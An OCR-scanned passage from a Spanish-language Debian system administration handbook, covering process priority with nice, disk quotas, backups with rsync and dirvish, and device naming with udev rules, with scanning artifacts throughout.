sobre  otros  procesos  en  ejecucion.  Por  supuesto,  si  no  hay  otros  procesos  que  nece- 
siten  ejecutar  el  programa  no  sera  restringido  artificialmente. 

nice  funciona  con  niveles  de  «bondad»:  los  niveles  positivos  (de  1  a  19)  reducen  pro- 
gresivamente  la  prioridad  mientras  que  los  niveles  negativos  (de  -1  a  -20)  aumentan 
la  prioridad  —  pero  solo  root  puede  utilizar  estos  niveles  negativos.  A  menos  que  se 
indique  lo  contrario  (revise  la  pagina  de  manual  nice(l)),  nice  aumentara  en  10 
el  nivel  actual. 

Si  descubre  que  una  tarea  que  esta  procesando  deberfa  haberse  ejecutado  con  ni¬ 
ce  no  es  muy  tarde  para  corregirlo;  el  programa  renice  modifica  la  prioridad  de 
cualquier  proceso  que  esta  en  ejecucion  en  la  direccion  que  desee  (pero  reducir  la 
«bondad»  de  un  proceso  esta  reservado  al  usuario  root). 


Instalar  el  paquete  anacron  desactiva  la  ejecucion  via  cron  de  los  scripts  en  los  directories 
/etc/cron. hourly/,  /etc/cron . daily/,  /etc/cron .weekly/  y  /etc/cron . monthly/.  Esto 
evita  que  sean  ejecutados  tanto  por  anacron  como  por  cron.  El  programa  cron  continuara  acti- 
voy  seguira  administrando  otras  tareas  programadas  (especialmente  aquellas  programadas  por 
los  usuarios). 


9.9.  Cuotas 

El  sistema  de  cuotas  permite  limitar  el  espacio  en  disco  reservado  para  un  usuario  o  grupo  de 
usuarios.  Para  configurarlo,  debe  tener  un  nucleo  compatible  (compilado  con  la  opcion  C0NFIG_ 
QUOTA)  —  como  es  el  caso  de  los  nucleos  Debian.  Puede  encontrar  el  software  de  administracion 
de  cuotas  en  el  paquete  Debian  quota. 
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Para  activar  las  cuotas  en  un  sistema  de  archivos  debe  indicar  las  opciones  usrquotay  grpquota 
en  el  archivo  /etc/f  stab  para  las  cuotas  de  usuario  y  grupos,  respectivamente.  Al  reiniciar  el 
equipo  se  actualizaran  las  cuotas  cuando  no  exista  actividad  en  el  disco  (una  condicion  necesaria 
para  poder  contabilizar  apropiadamente  el  espacio  en  disco  ya  utilizado). 

Ejecutar  edquota  usuario  (o  edquota  -g  grupo)lepermitemodificarlosKmitesmientrasexa- 
mina  el  uso  actual  del  espacio  en  disco. 


YENDO  MAS  ALLA  Puede  utilizar  el  programa  setquota  en  un  script  para  modificar  automaticamen- 
Definicion  de  cuotas  con  *-e  muchas  cuotas.  Su  pagina  de  manual  setquota(8)  contiene  los  detalles  de  la 
un  script  sintaxis  que  debe  utilizar. 


El  sistema  de  cuotas  le  permite  definir  cuatro  limites: 

■  dos  limites  (llamados  «suave»  y  «duro»)  se  refieren  a  la  cantidad  de  bloques  utilizados.  Si 
creo  el  sistema  de  archivos  con  un  tamano  de  bloque  de  1  kibibyte,  cada  bloque  contiene 
1024  bytes  del  mismo  archivo.  Por  lo  tanto,  los  bloques  no  saturados  inducen  perdida  de 
espacio  en  disco.  Puede  saturar  una  cuota  de  100  bloques,  que  teoricamente  permitirian 
almacenar  102400  bytes,  con  solo  100  archivos  de  500  bytes  cada  uno  que  solo  representan 
50000  bytes  en  total. 

■  dos  limites  (suave  y  duro)  que  hacen  referencia  a  la  cantidad  de  inodos  utilizados.  Cada 
archivo  ocupa  al  menos  un  inodo  para  almacenar  informacion  sobre  si  mismo  (permisos, 
dueno,  marcas  temporales  del  ultimo  acceso,  etc.).  Por  lo  tanto,  es  un  limite  en  la  cantidad 
de  archivos  del  usuario. 

Puede  exceder  temporalmente  un  limite  «suave»;  el  programa  via  rnquota,  generalmente  ejecu- 
tado  por  c  ron,  simplemente  advertira  al  usuario  que  excedieron  su  cuota.  Nunca  podra  exceder 
un  limite  «duro»:  el  sistema  rechazara  toda  operacion  que  fuera  a  exceder  una  cuota  dura. 


VOCABULARIO  El  sistema  de  archivos  divide  el  disco  duro  en  bloques  —  pequehas  areas  contiguas. 

Bloques  e  inodos  Definira  el  tamano  de  dichos  bloques  cuando  cree  el  sistema  de  archivos  y  general¬ 

mente  varia  entre  1  y  8  kibibytes. 

Un  bloque  puede  utilizarse  para  almacenar  los  datos  reales  de  un  archivo  o  los 
metadatos  utilizados  por  el  sistema  de  archivos.  Entre  estos  metadatos,  encontrara 
especialmente  los  inodos.  Un  inodo  utiliza  un  bloque  del  disco  duro  (pero  no  se  lo 
tiene  en  cuenta  respecto  a  la  cuota  de  bloques,  solo  en  la  cuota  de  inodos)  y  contiene 
tanto  la  informacion  del  archivo  al  que  corresponde  (nombre,  dueno,  permisos,  etc.) 
y  punteros  a  los  bloques  de  datos  que  son  utilizados  realmente.  Para  archivos  muy 
grandes  que  ocupan  mas  bloques  que  los  un  inodo  puede  referenciar,  existe  un 
sistema  de  bloques  indirectos;  el  inodo  hace  referencia  a  una  lista  de  bloques  que 
no  contienen  datos  directamente  sino  otra  lista  de  bloques. 


Si  ejecuta  edquota  -t  puede  definir  un  «perfodo  de  gracia»  maximo  autorizado  durante  el  que 
se  puede  exceder  un  limite  suave.  Luego  de  este  periodo  se  interpretara  el  limite  suave  como 
uno  duro  y  el  usuario  debera  reducir  su  uso  de  espacio  en  disco  por  debajo  de  este  limite  para 
poder  escribir  en  disco  duro. 
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YENDO  MAS  ALLA 

Configuration  de  una 
cuota  predeterminada 
para  nuevos  usuarios 


Para  definir  una  cuota  automatica  para  usuarios  nuevos,  debe  configurar  un  usua- 
rio  patron  (con  edquota  o  setquota)  e  indicar  su  nombre  de  usuario  en  la  variable 
QUOTAUSER  en  el  archivo  /etc/adduser.  conf.  Se  aplicara  automaticamente  dicha 
configuracion  de  cuota  a  cada  nuevo  usuario  creado  con  el  programa  adduser. 


9.10.  Respaldo 

Realizar  respaldos  es  una  de  las  principales  responsabilidades  de  cualquier  administrador;  pe- 
ro  es  un  tema  complejo,  que  involucra  herramientas  potentes  que  usualmente  son  dificiles  de 
dominar. 

Existen  muchos  programas,  como  amanda,  bacula  y  BackupPC.  Estos  son  sistemas  cliente/ser- 
vidor  con  muchas  opciones  y  cuya  configuracion  es  bastante  complicada.  Algunos  proveen  una 
interfaz  de  usuario  amigable  para  mitigarlo.  Sin  embargo,  como  bien  puede  comprobar  con  apt  - 
cache  search  backup,  Debian  contiene  docenas  de  paquetes  de  software  de  respaldo  que  cu- 
bren  todos  los  casos  de  uso  posibles. 

En  lugar  de  detallar  algunos  de  ellos,  esta  seccion  presentara  lo  que  pensaron  los  administrado- 
res  de  Falcot  Corp  cuando  definieron  su  estrategia  de  respaldos. 

En  Falcot  Corp  los  respaldos  tiene  dos  objetivos:  restaurar  archivos  eliminados  por  error  y  recu- 
perar  rapidamente  cualquier  equipo  (servidor  o  de  escritorio)  en  el  que  falle  el  disco  duro. 


9.10.1.  Respaldos  con  rsync 

Habiendo  descartado  los  respaldos  en  cintas  por  ser  lentos  y  costosos,  se  respaldaran  los  datos 
en  discos  duros  en  un  servidor  dedicado  en  el  que  utilizaran  RAID  por  software  (revise  la  Seccion 

12.1.1,  «RAID  por  software))  pagina  322)  que  protegera  los  datos  contra  errores  de  disco  duro.  No 
se  respaldaran  individualmente  los  equipos  de  escritorio,  pero  se  le  informa  a  los  usuarios  que 
se  respaldara  su  cuenta  personal  en  el  servidor  de  archivos  del  departamento.  Se  utiliza  diaria- 
mente  el  programa  rsync  (en  el  paquete  del  mismo  nombre)  para  respaldar  estos  diferentes 
servidores. 


VOLVER  A  LOS  CIMIENTOS 

El  enlace  duro,  un 
segundo  nombre  para  el 
archivo 


A  diferencia  de  un  enlace  simbolico,  no  se  puede  diferenciar  un  enlace  duro  del  ar¬ 
chivo  enlazado.  Crear  un  enlace  duro  es  esencialmente  lo  mismo  que  dar  al  archivo 
un  segundo  nombre.  Es  por  esto  que  eliminar  un  enlace  duro  solo  elimina  uno  de 
los  nombres  asociados  al  archivo.  Siempre  que  quede  otro  nombre  asociado  al  ar¬ 
chivo,  los  datos  en  el  seguiran  presentes  en  el  sistema  de  archivos.  Es  interesante 
saber  que,  a  diferencia  de  una  copia,  un  enlace  duro  no  ocupa  espacio  adicional  en 
el  disco  duro. 


Puede  crear  un  enlace  duro  con  In  objetivo  enlace.  El  archivo  enlace  sera  un 
nuevo  nombre  para  el  archivo  objetivo.  Solo  puede  crear  enlaces  duros  en  el  mismo 
sistema  de  archivos,  mientras  que  los  enlaces  simbolicos  no  tienen  dicha  restriccion. 
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El  espacio  en  disco  disponible  prohibe  la  implementacion  de  un  respaldo  diario  completo.  Por  lo 
tanto,  el  programa  rsync  es  precedido  con  una  duplicacion  del  contenido  del  respaldo  anterior 
con  enlaces  duros,  lo  que  evita  utilizar  demasiado  espacio  en  disco.  Luego,  el  proceso  rsync  solo 
reemplazara  los  archivos  que  fueron  modificados  desde  el  ultimo  respaldo.  Con  este  mecanismo, 
pueden  mantener  una  gran  cantidad  de  respaldos  en  un  espacio  pequeno.  Debido  a  que  todos 
los  respaldos  estan  disponibles  inmediatamente  (por  ejemplo,  en  diferentes  directories  de  un 
recurso  compartido  en  la  red)  puede  realizar  comparaciones  entre  dos  fechas  rapidamente. 

Puede  implementar  facilmente  este  mecanismo  de  respaldo  con  el  programa  dirvish.  Utiliza 
un  espacio  de  almacenamiento  de  respaldo  («bank»  —  banco  —  en  su  vocabulario)  en  el  que 
ubica  copias  con  marcas  temporales  de  conjuntos  de  archivos  de  respaldo  (estos  conjuntos  son 
llamados  «vaults»  —  bovedas  —  en  la  documentacion  de  dirvish). 

La  configuracion  principal  se  encuentra  en  el  archivo  /etc/dirvish/master .  conf.  Define  la 
ubicacion  del  espacio  de  almacenamiento  de  respaldos,  la  lista  de  «bovedas»  administradas  y 
los  valores  predeterminados  de  expiracion  de  los  respaldos.  El  resto  de  la  configuracion  esta 
ubicada  en  los  archivos  banco/ bo  veda/di  rvish/def  a  ult .  conf  y  contienen  las  configuraciones 
especificas  a  los  conjuntos  de  archivos  correspondientes. 

Ejemplo  9.3  EL  archivo  /etc/dirvish/master .  conf 

bank: 

/backup 
exclude : 

lost+found/ 

core 

*_ 


Runall : 

root  22:00 


expire-default 
expire- rule : 

#  MIN  HR 

:  +15  days 

DOM  MON 

DOW 

STRFTIMEFMT 

* 

* 

*  * 

1 

+3  months 

* 

* 

1-7  * 

1 

+1  year 

* 

* 

1-7  1,4,7,10 

1 

La  configuracion  bank  indica  el  directorio  en  el  que  se  almacenaran  los  respaldos.  La  configu¬ 
racion  exclude  le  permite  indicar  archivos  (o  tipos  de  archivo)  a  excluir  del  respaldo.  Runall  es 
una  lista  de  conjuntos  de  archivos  a  respaldar  con  una  marca  temporal  para  cada  conjunto,  lo 
que  le  permite  asignar  la  fecha  correcta  la  copia  en  caso  que  el  respaldo  no  ejecute  exactamente 
en  el  momento  programado.  Debe  indicar  una  hora  justo  antes  del  momento  de  ejecucion  (las 
22:04  de  forma  predeterminada  en  Debian,  segun  /etc/cron  .d/dirvish).  Linalmente,  las  con¬ 
figuraciones  expire-default  y  expire-rule  definen  las  politicas  de  expiracion  para  los  respaldos. 
El  ejemplo  anterior  mantiene  por  siempre  los  respaldos  generados  el  primer  domingo  de  cada 
trimestre,  elimina  despues  de  un  ano  aquellos  realizados  el  primer  domingo  de  cada  mes  y  luego 
de  3  meses  aquellos  realizados  otros  dias  domingo.  Mantendra  los  demas  respaldos  diarios  por 
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15  dfas.  El  orden  de  las  reglas  si  importa,  Dirvish  utiliza  la  ultima  regia  que  coincida  o  la  directiva 
expire-default  si  ninguna  lmea  de  expire-rule  coincide. 


EN  LA  PRACTICA  di  rvish  - expi re  no  utiliza  las  reglas  de  expiracion  para  realizar  su  trabajo.  En 

Expiracion  programada  realidad,  se  utilizan  las  reglas  de  expiracion  cuando  se  crea  una  nueva  copia  de 

respaldo  para  definir  lafecha  de  expiracion  asociada  con  dicha  copia.  dirvish -exp 
ire  simplemente  examina  las  copias  almacenadas  y  elimina  aquellas  cuyas  fechas 
de  expiracion  ya  pasaron. 


Ejemplo  9.4  El  archivo  /backup/ root/ dirvish/ default .  conf 

client:  rivendell.falcot.com 
t  ree :  / 
xdev:  1 
index:  gzip 
image-default:  ^f%ri%d 
exclude : 

/var/cache/apt/archives/* . deb 
/var/cache/man/** 

/tmp/** 

/var/tmp/** 

* .  bak 


El  ejemplo  anterior  especifica  el  conjunto  de  archivos  a  respaldar:  los  archivos  en  la  maquina 
rivendell.falcot.com  (para  respaldos  de  datos  locales,  simplemente  especifique  el  nombre  local  del 
equipo  segun  indica  hostname),  especialmente  aquellos  en  el  arbol  raiz  (tree:/),  excepto  aquellos 
enumerados  en  exclude.  El  respaldo  estara  limitado  a  los  contenidos  de  un  sistema  de  archivos 
(xdev:l).  No  incluira  archivos  de  otros  puntos  de  montaje.  Generara  un  indice  de  los  archivos 
almacenados  (index:gzip)  y  el  nombre  de  la  imagen  estara  basado  en  la  fecha  actual  (image-def 
ault:  %Y  %m  %d). 

Existen  muchas  opciones  disponibles,  todas  documentadas  en  la  pagina  de  manual  dirvish. 
co n  f  ( 5 ) .  Una  vez  que  finalizo  estos  archivos  de  configuracion  deben  inicializar  cada  conjunto  de 
archivos  ejecutando  dirvish  --vault  boveda  - -init.  Luego,  la  ejecucion  dirvish- runall 
automaticamente  generara  una  nueva  copia  de  respaldo  inmediatamente  despues  de  eliminar 
aquellas  que  hayan  expirado. 


EN  LA  PRACTICA  Cuando  dirvish  necesita  guardar  datos  en  una  maquina  remota,  utilizara  ssh  para 
Respaldos  remotos  sobre  conectarse  con  ella,  e  iniciara  rsync  en  modo  servidor.  Esto  necesita  que  el  usuario 
SSH  ro°t  Pueda  conectarse  automaticamente.  Las  Haves  de  autenticacion  SSH  permiten 
esto  exactamente  (revise  la  Seccion  9. 2. 1.1,  «Autenticacion  basada  en  llaves»  pagina 

205). 
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9.10.2.  Restauracion  de  equipos  sin  repaldos 


Los  equipos  de  escritorio,  que  no  son  respaldados,  seran  faciles  de  reinstalar  desde  DVD-ROMs 
personalizados  que  fueron  preparados  con  Simple-CDD  (revise  la  Seccion  12.3.3,  «Simple-CDD:  la 
solucion  todo-en-uno»  pagina  365).  Dado  que  se  realiza  una  instalacion  desde  cero,  se  pierden 
todas  las  personalizaciones  que  pueden  haberse  realizado  luego  de  la  instalacion  inicial.  Esto 
no  es  un  problema  ya  que  los  sistemas  estan  conectados  a  un  directorio  LDAP  central  para  las 
cuentas  de  usuario  y  la  mayorfa  de  las  aplicaciones  de  escritorio  son  preconfiguradas  gracias  a 
dconf  (revise  la  Seccion  13.3.1,  «GNOME»  pagina  382  para  mas  informacion  al  respecto). 

Los  administradores  de  Falcot  Corp  estan  al  tanto  de  las  limitaciones  de  sus  politicas  de  respaldo. 
Debido  a  que  no  pueden  proteger  el  servidor  de  respaldo  tan  bien  como  una  cinta  en  una  caja 
fuerte  a  prueba  de  fuego,  lo  instalaron  en  una  habitacion  separada  para  que  desastres  como 
fuego  en  la  sala  de  servidores  no  destruyan  los  respaldos  junto  con  todo  lo  demas.  Lo  que  es 
mas,  realizan  un  respaldo  incremental  en  DVD-ROM  una  vez  por  semana  —  solo  se  incluyen  los 
archivos  que  fueron  modificados  desde  el  ultimo  respaldo. 

YENDOMAsallA  No  es  posible  hacer  copia  de  seguridad  de  muchos  servicios  (como  bases  de  da- 
Respaldo  de  servicios  t°s  SQL  y  LDAP)  simplemente  copiando  sus  archivos  (a  menos  que  sean  detenidos 
SQL  y  LDAP  apropiadamente  mientras  se  crean  estos  respaldos,  lo  que  frecuentemente  es  pro- 
blematico  ya  que  fueron  pensados  para  estar  disponibles  todo  el  tiempo).  Por  lo 
tanto  es  necesario  utilizar  un  mecanismo  de  «exportacion»  para  crear  un  «volcado 
de  datos»  que  pueda  ser  respaldado  de  forma  segura.  Generalmente  son  archivos 
grandes  pero  se  comprimen  facilmente.  Para  reducir  el  espacio  de  almacenamiento 
necesario,  se  puede  almacer  unicamente  un  archivo  de  texto  completo  por  semana 
y  diferencias  (dif  f)  cada  dia,  que  puede  crear  utilizando  una  orden  similar  a  dif  f 
archivo  deayer  archivodehoy.  El  programa  xdelta  produce  diferencias  in- 
crementales  de  volcados  binarios. 


CULTURA  Historicamente,  la  forma  mas  sencilla  de  realizar  un  respaldo  en  Unix  eraalmacenar 
TAR  el  estandar  para  un  comPer|dio  TAR  en  una  cinta.  Inclusive  el  programa  tar  obtuvo  su  nombre  de 
respaldos  en  cinta  «compendio  en  cinta»  («Tape  ARchive»). 


9.11  Conexion  en  caliente:  hotplug 
9. 11.1.  Introduccion 

El  subsistema  hotplug  del  nucleo  administra  dinamicamente  el  agregar  y  eliminar  dispositivos 
mediante  la  carga  de  los  controladores  apropiados  y  la  creacion  de  los  archivos  de  dispositivo 
correspondientes  (con  la  ayuda  de  udevd).  Con  el  hardware  moderno  y  la  virtualizacion,  casi  to¬ 
do  puede  ser  conectado  en  caliente:  desde  los  perifericos  USB/PCMCIA/IEEE  1394  usuales  hasta 
discos  duros  SATA,  pero  tambien  la  CPU  y  la  memoria. 

El  nucleo  tiene  una  base  de  datos  que  asocia  cada  ID  de  dispositivo  con  el  controlador  necesario. 
Se  utiliza  esta  base  de  datos  durante  el  inicio  para  cargar  todos  los  controladores  de  los  peri¬ 
fericos  detectados  en  los  diferentes  canales,  pero  tambien  cuando  se  conecta  un  dispositivo  en 
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caliente.  Una  vez  el  dispositivo  esta  listo  para  ser  utilizado  se  envfa  un  mensaje  a  udevd  para 
que  pueda  crear  los  elementos  correspondientes  en  /dev/. 


9.11.2.  El  problema  de  nombres 

Antes  que  existieran  las  conexiones  en  caliente,  era  sencillo  asignar  un  nombre  fijo  a  un  dispo¬ 
sitivo.  Simplemente  estaba  basado  en  la  posicion  del  dispositivo  en  su  canal  correspondiente. 
Pero  esto  no  es  posible  cuando  dichos  dispositivos  puede  aparecer  y  desaparecer  del  canal.  El 
caso  tipico  es  el  uso  de  una  camara  digital  y  una  Have  USB,  ambos  seran  un  disco  para  el  equipo. 
El  primero  enconectarse  puede  ser /dev/sdby  el  segundo  /dev/sdc  (siempre  que  /dev/sda  re¬ 
presente  el  disco  duro  del  equipo  en  si).  El  nombre  del  dispositivo  no  es  fijo,  depende  del  orden 
en  el  que  se  conecte  los  dispositivos. 

Ademas,  mas  y  mas  controladores  utilizan  valores  dinamicos  para  los  numeros  mayor/menor 
de  los  dispositivos,  lo  que  hace  imposible  tener  elementos  estaticos  para  dichos  dispositivos  ya 
que  estas  caracteristicas  esenciales  puede  cambiar  luego  de  reiniciar  el  equipo. 

Se  creo  udev  precisamente  para  solucionar  este  problema. 


EN  LA  PRACTICA  Muchos  equipos  disponen  de  varias  tarjetas  de  red  (a  veces  dos  interfaces  cableadas 
Administracion  de  Y  una  interfaz  inalambrica)  y  ahora  que  la  mayoria  de  los  canales  son  compatibles 

tarjetas  de  red  con  cambio  en  caliente  ( hotplug ),  el  nucleo  de  Linux  ya  no  garantiza  un  nombre 

fijo  para  cada  interfaz  de  red.  jPero  un  usuario  que  desea  configurar  su  red  en 
/etc/network/interfaces  necesita  un  nombre  que  no  cambie! 

Seria  dificil  pedirle  a  todos  los  usuarios  que  creen  sus  propias  relgas  udev  para 
evitar  este  problema.  Es  por  esto  que  se  configure  udev  de  una  forma  particular: 
cuando  inicia  por  primera  vez  (y,  de  forma  mas  general,  cada  vez  que  detecta  una 
nueva  tarjeta  de  red)  utiliza  el  nombre  de  la  interfaz  de  red  y  su  direccion  MAC 
para  crear  nuevas  reglas  que  le  asignaran  el  mismo  nombre  cada  vez  que  inicie. 
Almacena  estas  reglas  en  /etc/udev/ rules .  d/70-  persistent-  net .  rules. 

Este  mecanismo  tiene  unos  efectos  secundarios  que  deberia  conocer.  Considere- 
mos  el  caso  de  una  maquina  que  solo  tiene  una  tarjeta  de  red  PCI.  Logicamente, 
la  interfaz  de  red  se  llama  eth0.  Digamos  ahora  que  la  tarjeta  deja  de  funcionar  y 
el  administrador  la  reemplaza;  la  nueva  tarjeta  tendra  una  nueva  direccion  MAC. 
Debido  a  que  el  nombre  eth0  fue  asignado  a  la  tarjeta  anterior,  a  la  nueva  se  le 
asignara  ethl  aunque  eth0  no  aparecera  nunca  mas  (y  la  red  no  funcionara  porque 
/etc/network/interfaces  probablemente  configura  la  interfaz  eth0).  En  este  ca¬ 
so,  basta  con  borrar  el  archivo  /etc/udev/ rules  .  d/70  -  persistent  -  net  .rules 
antes  de  reiniciar  el  equipo.  Asi  se  le  asignara  el  nombre  esperado,  eth0  a  la  nueva 
tarjeta. 


9.1 1.3.  Como  funciona  udev 

Cuando  el  nucleo  le  informa  a  udev  de  la  aparicion  de  un  nuevo  dispositivo,  recolecta  mucha  in- 
formacion  sobre  el  dispositivo  consultando  los  elementos  correspondientes  en  /sys/;  especial- 
mente  aquellos  que  lo  identifican  univocamente  (direccion  MAC  para  una  tarjeta  de  red,  ntimero 
de  serie  para  algunos  dispositivos  USB,  etc.). 
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Con  esta  informacion,  udev  luego  consul  ta  todas  las  reglas  en  /et  c/udev/  rules .  d  y  /lib/udev/ 
rules .  d.  En  este  proceso  decide  como  nombrar  al  dispositivo,  los  enlaces  simbolicos  que  creara 
(para  darle  nombres  alternativos)  y  los  programas  que  ejecutara.  Se  consultan  todos  estos  ar- 
chivos  y  se  evaluan  las  reglas  secuencialmente  (excepto  cuando  un  archivo  utiliza  la  directiva 
«GOTO»).  Por  lo  tanto,  puede  haber  varias  reglas  que  correspondan  a  un  evento  dado. 

La  sintaxis  de  los  archivos  de  reglas  es  bastante  simple:  cada  fila  contiene  criterios  de  selecciony 
asignaciones  de  variables.  El  primero  se  utiliza  para  seleccionar  los  eventos  ante  los  que  reaccio- 
nar  y  el  ultimo  define  las  acciones  a  tomar.  Se  los  separa  simplemente  con  comas  y  el  operador 
implicitamente  diferencia  entre  un  criterio  de  seleccion  (con  operaciones  de  comparacion  como 
==  o  !=)  o  una  directiva  de  asignacion  (con  operadores  como  =,  +=  o  :=). 

Se  utilizan  los  operadores  de  comparacion  en  las  siguientes  variables: 

■  KERNEL:  el  nombre  que  el  nucleo  le  asigna  al  dispositivo; 

■  ACTION:  la  accion  que  corresponde  al  evento  («add»  cuando  se  agrego  un  dispositivo, 
«remove»  cuando  fue  eliminado); 

■  DEVPATH:  la  ruta  al  elemento  del  dispositivo  en  /sys/; 

■  SU  BSYSTEM:  el  subsistema  del  nucleo  que  genero  el  pedido  (hay  muchos,  pero  unos  pocos 
ejemplos  son  «usb»,  «ide»,  «net»,  «firmware»,  etc.); 

■  ATTR {atributo}:  el  contenido  del  archivo  attribute  en  el  directorio  /sys/ ruta  de 
dispositivo/  del  dispositivo.  Aqui  es  donde  encontrara  la  direccion  MAC  y  otros  iden- 
tificadores  especificos  del  canal; 

■  KERNELS,  SUBSYSTEMS  y  ATTRS {atributos}  son  variaciones  que  intentaran  coincidir  las 
diferentes  opciones  en  alguno  de  los  dispositivos  padre  del  dispositivo  actual; 

■  PROGRAM:  delega  la  prueba  al  programa  indicado  (coincidira  si  devuelve  0,  no  lo  hara 
de  lo  contrario).  Se  almacenara  el  contenido  de  la  salida  estandar  del  programa  para  que 
pueda  utilizarse  en  la  prueba  RESULT; 

■  RESULT :  ejecuta  pruebas  en  la  salida  estandar  almacenada  durante  la  ultima  ejecucion  de 
una  sentencia  PROGRAM. 

Los  operadores  correctos  puede  utilizar  expresiones  con  patrones  para  que  coincidan  varios 
valores  simultaneamente.  Por  ejemplo,  *  coincide  con  cualquier  cadena  (inclusive  una  vacia);  ? 
coincide  con  cualquier  caracter  y  []  coincide  el  conjunto  de  caracteres  enumerados  entre  los 
corchetes  (lo  opuesto  si  el  primer  caracter  es  un  signo  de  exclamacion  y  puede  indicar  rangos 
de  caracteres  de  forma  similar  a  a-z). 

En  cuanto  a  los  operadores  de  asignacion,  =  asigna  un  valor  (y  reemplaza  el  valor  actual);  en  el 
caso  de  una  lista,  es  vaciada  y  solo  contendra  el  valor  asignado.  :=  realiza  lo  mismo  pero  evita 
cambios  futuros  en  la  misma  variable.  Respecto  a  +=,  agrega  elementos  a  una  lista.  Puede  modi- 
ficar  las  siguientes  variables: 

■  NAME:  el  nombre  del  archivo  de  dispositivo  que  se  creara  en  /dev/.  Solo  se  tiene  en  cuen- 
ta  la  primera  asignacion,  las  demas  son  ignoradas; 

■  SYMLINK:  la  lista  de  enlaces  simbolicos  que  apuntaran  al  mismo  dispositivo; 
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■  OWNER,  GROUP  y  MODE  definen  el  usuario  y  el  grupo  duenos  del  dispositivo  asf  como 
tambien  los  permisos  asociados,  respectivamente; 

■  RUN:  la  lista  de  programas  a  ejecutar  en  respuesta  a  este  evento. 

Los  valores  asignados  a  estas  variables  pueden  utilizar  algunas  substituciones: 

■  $kernel  o  %k:  equivalente  a  KERNEL; 

■  $number  o  %n:  el  numero  de  orden  del  dispositivo;  por  ejemplo,  para  sda3  seria  «3»; 

■  $devpath  o  %p:  equivalente  a  DEVPATH; 

■  $attr {atributo}  o  %s {atributo}:  equivalentes  a  ATTRS{atributo}; 

■  $major  o  %M:  el  numero  mayor  del  dispositivo  en  el  nucleo; 

■  $mior  o  % m:  el  numero  menor  del  dispositivo  en  el  nucleo; 

■  $result  o  %c:  la  cadena  de  salida  del  ultimo  programa  ejecutado  por  PROGRAM; 

■  finalmente,  %  %  y  $$  para  los  signos  de  porcentaje  y  el  simbolo  de  moneda  respectivamen¬ 
te. 

La  lista  anterior  no  esta  completa  (solo  incluye  los  parametros  mas  importantes),  pero  la  pagina 
de  manual  udev  ( 7 )  deberia  serlo. 


9.1 1.4.  Un  ejemplo  concreto 

Consideremos  el  caso  de  una  simple  Have  USB  e  intentemos  asignarle  un  nombre  fijo.  Primero 
debe  encontrar  los  elementos  que  la  identificaran  de  manera  univoca.  Para  ello,  conectela  y 
ejecuta  udevadm  info  -a  -n  /dev/ sd c  (reemplazando  /dev/sdc  con  el  nombre  real  asignado 
a  la  Have). 

#  udevadm  info  -a  -n  /dev/sdc 

[.  .  .] 

looking  at  device  '/devices/pci0000 : 00/0000 : 00 : 10 . 3/usbl/l-2/l-2 . 2/1-2 . 2 : 1 . 0/host9/ 
target9:0:0/9:0:0:0/block/sdc' : 

KERNEL=="sdc" 

SUBS YSTEM==" block" 

DRIVER=="" 

ATTR{ range}=="16" 

ATTR{ext_range}=="256" 

ATTR{ removable}=="l" 

ATTR{ ro}=="0" 

ATTR{size}==" 126976" 

ATTR{alignment_of f set}=="0" 

ATTR{ capability }==”53" 

ATTR{stat}==”  51  100  1208  256  0  0  0 

0  0  192  25  6" 

ATTR{inf light }=="  0  0" 

[...] 
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looking  at  parent  device  '/devices/pci0000 : 00/0000 : 00 : 10 . 3/usbl 
/ 1 -  2/1 -  2 . 2/1 -  2 . 2 : 1 . 0/host9/ta rget9 : 0 : 0/9 : 0 : 0 : 0 ' : 

KERNELS=="9 : 0 : 0 : 0" 

SUBSYSTEMS=="scsi" 

DRIVERS=="sd” 

ATTRS{device_blocked}=="0" 

ATTRS{type}=="0" 

ATTRS{scsi  level }=="3” 

ATTRS{vendor}==" IOMEGA  " 

ATTRS{model}==”UMni64MB*I0M2C4  " 

ATTRS{ rev}==" 

ATTRS{state}==” running" 

[■■  ■] 

ATTRS{max_sectors}=="240” 

[■■  ■] 

looking  at  parent  device  '/devices/pci0000 : 00/0000 : 00 : 10 . 3/usbl/l-2/l-2 . 2 ' : 
KERNELS=="9 : 0 : 0 : 0" 

SUBSYSTEMS=="usb" 

DRIVERS==”usb" 

ATTRS{conf iguration}=="iCfg" 

ATTRS{bNumInterfaces}=="  1" 

ATTRS{bConf igurationValue}=="l" 

ATTRS{bmAtt ributes}==”80" 

ATTRS{ bMaxPowe  r}==" 100mA" 

ATTRS{u  rbnum}=="398" 

ATTRS{idVendor}=="4146" 

ATTRS{idProduct}=="4146" 

ATTRS{bcdDevice}=="0100" 

[...] 

ATTRS{manuf acturer}=="USB  Disk" 

ATTRS{product}=="USB  Mass  Storage  Device" 

ATTRS{se rial }=="M00402 1000001" 

[■■■] 

Para  crear  una  nueva  regia,  puede  utilizar  las  pruebas  en  las  variables  del  dispositivo  asf  como 
tambien  en  los  dispositivos  padre.  El  caso  anterior  le  permite  crear  dos  reglas  como  las  siguien- 
tes: 


KERNEL=="sd?" ,  SUBSYSTEM=="block" ,  ATTRS{serial}=="M004021000001" ,  SYMLINK+="usb  key/ 
disk" 

KERNEL=="sd? [0-9] " ,  SUBSYSTEM=="block" ,  ATTRS{serial}=="M004021000001" ,  SYMLINK+=" 

*+■  usb  key/part %i" 

Una  vez  que  haya  guardado  estas  reglas  en  un  archivo,  llamado  por  ejemplo  /etc/udev/  rules . 
d,  puede  desconectar  y  conectar  la  Have  USB.  Podra  ver  que  /dev/usbkey/disk  representa  el 
disco  asociado  con  la  Have  USB  y  /dev/usb  key/partl  como  su  primera  particion. 
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YENDOMAsallA  Al  igual  que  muchos  demonios,  udevd  almacena  registros  en  /var/log/daemon . 
Depuracion  de  la  tog.  F>ero  no  es  muY  descriptive)  de  forma  predeterminada  y  generalmente  no  son 
configuracion  de  udev  suficientes  para  entender  lo  que  esta  sucediendo.  Ejecutar  udevadm  control  -- 
log-priority=info  aumenta  el  nivel  de  informacion  y  soluciona  este  problema. 
udevadm  control  - -log-priority=err  vuelve  al  valor  predeterminado. 


9.12.  Gestion  de  energia:  interfaz  avanzada  de  configuracion  y  energia  (AC¬ 
PI:  «Advanced  Configuration  and  Power  Interface) 

Usualmente,  el  tema  de  administracion  de  energia  es  problematico.  Suspender  apropiadamente 
un  equipo  necesita  que  todos  los  controladores  de  los  dispositivos  en  el  sepan  como  configurar- 
los  en  reposo  y  reconfigurarlos  apropiadamente  al  despertar  la  maquina.  Desafortunadamente, 
aun  existen  algunos  dispositivos  que  no  pueden  suspender  correctamente  en  Linux  debido  a  que 
sus  fabricantes  no  proveen  las  especificaciones  necesarias. 

